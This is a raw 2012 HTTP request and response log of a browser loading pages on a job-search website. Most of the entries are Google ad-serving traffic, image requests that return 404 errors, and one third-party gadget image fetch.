Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2910537132751306&amp;output=html&amp;h=280&amp;slotname=6394158133&amp;w=336&amp;ea=0&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305277758&amp;bpp=6&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352305277913&amp;frm=8&amp;adk=1028924267&amp;ga_vid=1740851937.1352305278&amp;ga_sid=1352305278&amp;ga_hid=506299075&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=343&amp;ish=340&amp;ifk=3411974630&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=174
If-None-Match: 426692510519060060
HTTP/1.1 304 Not Modified

HTTP/1.1 304 Not Modified
Date: Wed, 07 Nov 2012 02:06:16 GMT
Expires: Thu, 08 Nov 2012 02:06:16 GMT
Etag: 426692510519060060
Age: 51302
Server: GFE/2.0
GET /pagead/js/r20121031/r20110914/abg.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2910537132751306&amp;output=html&amp;h=280&amp;slotname=6394158133&amp;w=336&amp;ea=0&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305277758&amp;bpp=6&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352305277913&amp;frm=8&amp;adk=1028924267&amp;ga_vid=1740851937.1352305278&amp;ga_sid=1352305278&amp;ga_hid=506299075&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=343&amp;ish=340&amp;ifk=3411974630&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=174
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 5725237117596964362
Date: Mon, 05 Nov 2012 23:22:33 GMT
Expires: Mon, 19 Nov 2012 23:22:33 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 327
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 147525
GET /simgad/3896125201042933978 HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2910537132751306&amp;output=html&amp;h=280&amp;slotname=6394158133&amp;w=336&amp;ea=0&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305277758&amp;bpp=6&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352305277913&amp;frm=8&amp;adk=1028924267&amp;ga_vid=1740851937.1352305278&amp;ga_sid=1352305278&amp;ga_hid=506299075&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=343&amp;ish=340&amp;ifk=3411974630&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=174
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Mon, 10 Sep 2012 13:57:22 GMT
Date: Wed, 07 Nov 2012 16:18:05 GMT
Expires: Thu, 07 Nov 2013 16:18:05 GMT
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 50304
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 193
GET /jobsearchtools.html/186/images/01b.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=394
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/left_back.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=394
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/02b.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=394
Connection: Keep-Alive
GET /pagead/images/x_button.png HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2910537132751306&amp;output=html&amp;h=280&amp;slotname=6394158133&amp;w=336&amp;ea=0&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305277758&amp;bpp=6&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352305277913&amp;frm=8&amp;adk=1028924267&amp;ga_vid=1740851937.1352305278&amp;ga_sid=1352305278&amp;ga_hid=506299075&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=343&amp;ish=340&amp;ifk=3411974630&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=174
HTTP/1.1 200 OK

Content-Type: image/png
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 11716456811728123628
Date: Wed, 07 Nov 2012 03:34:35 GMT
Expires: Thu, 08 Nov 2012 03:34:35 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 159
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 46004
GET /pagead/images/x_button_dark.png HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2910537132751306&amp;output=html&amp;h=280&amp;slotname=6394158133&amp;w=336&amp;ea=0&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305277758&amp;bpp=6&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352305277913&amp;frm=8&amp;adk=1028924267&amp;ga_vid=1740851937.1352305278&amp;ga_sid=1352305278&amp;ga_hid=506299075&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=343&amp;ish=340&amp;ifk=3411974630&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=174
HTTP/1.1 200 OK

Content-Type: image/png
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 17994598330340787634
Date: Wed, 07 Nov 2012 02:08:11 GMT
Expires: Thu, 08 Nov 2012 02:08:11 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 158
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 51188
GET /pagead/images/green-check.png HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2910537132751306&amp;output=html&amp;h=280&amp;slotname=6394158133&amp;w=336&amp;ea=0&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305277758&amp;bpp=6&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352305277913&amp;frm=8&amp;adk=1028924267&amp;ga_vid=1740851937.1352305278&amp;ga_sid=1352305278&amp;ga_hid=506299075&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=343&amp;ish=340&amp;ifk=3411974630&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=174
HTTP/1.1 200 OK

Content-Type: image/png
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 17734124060297529551
Date: Wed, 07 Nov 2012 02:04:46 GMT
Expires: Thu, 08 Nov 2012 02:04:46 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 394
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 51393
GET /pagead/images/google-logo.png HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2910537132751306&amp;output=html&amp;h=280&amp;slotname=6394158133&amp;w=336&amp;ea=0&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305277758&amp;bpp=6&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352305277913&amp;frm=8&amp;adk=1028924267&amp;ga_vid=1740851937.1352305278&amp;ga_sid=1352305278&amp;ga_hid=506299075&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=343&amp;ish=340&amp;ifk=3411974630&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=174
HTTP/1.1 200 OK

Content-Type: image/png
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 13513653691308934734
Date: Wed, 07 Nov 2012 01:56:22 GMT
Expires: Thu, 08 Nov 2012 01:56:22 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 4114
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 51897
GET /jobsearchtools.html/186/images/03b.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=393
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/04b.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=394
Connection: Keep-Alive
GET /pagead/drt/s?v=r20120211 HTTP/1.1

Host: googleads.g.doubleclick.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2910537132751306&amp;output=html&amp;h=280&amp;slotname=6394158133&amp;w=336&amp;ea=0&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305277758&amp;bpp=6&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352305277913&amp;frm=8&amp;adk=1028924267&amp;ga_vid=1740851937.1352305278&amp;ga_sid=1352305278&amp;ga_hid=506299075&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=343&amp;ish=340&amp;ifk=3411974630&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=174
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
X-Frame-Options: ALLOWALL
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Wed, 07 Nov 2012 15:38:11 GMT
Server: safe
Content-Length: 141
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=3600
Age: 2588
GET /pagead/drt/ui HTTP/1.1

Host: www.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: https://googleads.g.doubleclick.net/pagead/drt/si?p=CAA&amp;ut=AFAKxlQAAAAAUJqOAztACU1hUeSWAobVEMS1jngytS00
Cache-Control: private
X-Frame-Options: ALLOWALL
X-Content-Type-Options: nosniff
Date: Wed, 07 Nov 2012 16:21:19 GMT
Server: safe
Content-Length: 304
X-XSS-Protection: 1; mode=block
GET /jobsearchtools.html/186/images/05b.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=393
Connection: Keep-Alive
GET /bg/chVL4ii63HO8PHZ862lFB7RQHpSvg33s68eDUue2RxM.js HTTP/1.1

Host: www.gstatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2910537132751306&amp;output=html&amp;h=280&amp;slotname=6394158133&amp;w=336&amp;ea=0&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305277758&amp;bpp=6&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352305277913&amp;frm=8&amp;adk=1028924267&amp;ga_vid=1740851937.1352305278&amp;ga_sid=1352305278&amp;ga_hid=506299075&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=343&amp;ish=340&amp;ifk=3411974630&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=174
HTTP/1.1 200 OK

Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Wed, 31 Oct 2012 16:20:27 GMT
Date: Tue, 06 Nov 2012 19:39:26 GMT
Expires: Wed, 14 Nov 2012 19:39:26 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 3254
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=691200
Age: 74513
GET /pagead/drt/si?p=CAA&ut=AFAKxlQAAAAAUJqOAztACU1hUeSWAobVEMS1jngytS00 HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/drt/si?p=CAA&amp;ut=AFAKxlQAAAAAUJqOAztACU1hUeSWAobVEMS1jngytS00 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
Set-Cookie: _drt_=NO_DATA; expires=Thu, 08-Nov-2012 04:21:19 GMT; path=/; domain=.doubleclick.net; HttpOnly
X-Frame-Options: ALLOWALL
X-Content-Type-Options: nosniff
Date: Wed, 07 Nov 2012 16:21:19 GMT
Server: safe
Content-Length: 0
X-XSS-Protection: 1; mode=block
Expires: Wed, 07 Nov 2012 16:21:19 GMT
Cache-Control: private
GET /jobsearchtools.html/186/images/07b.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:19 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=393
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/06b.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:19 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=393
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/08b.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:19 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=393
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/09b.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:19 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=392
Connection: Keep-Alive
GET /ladder1.gif HTTP/1.1

Host: www.nuzs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www-open-opensocial.googleusercontent.com/gadgets/ifr?url=http%3A%2F%2Fnuzs.com%2Fpromotion.xml&amp;container=open&amp;view=home&amp;lang=all&amp;country=ALL&amp;debug=0&amp;nocache=0&amp;sanitize=0&amp;v=232824d3a7ae247c&amp;source=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;parent=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;libs=core%3Acore.io
HTTP/1.1 200 OK

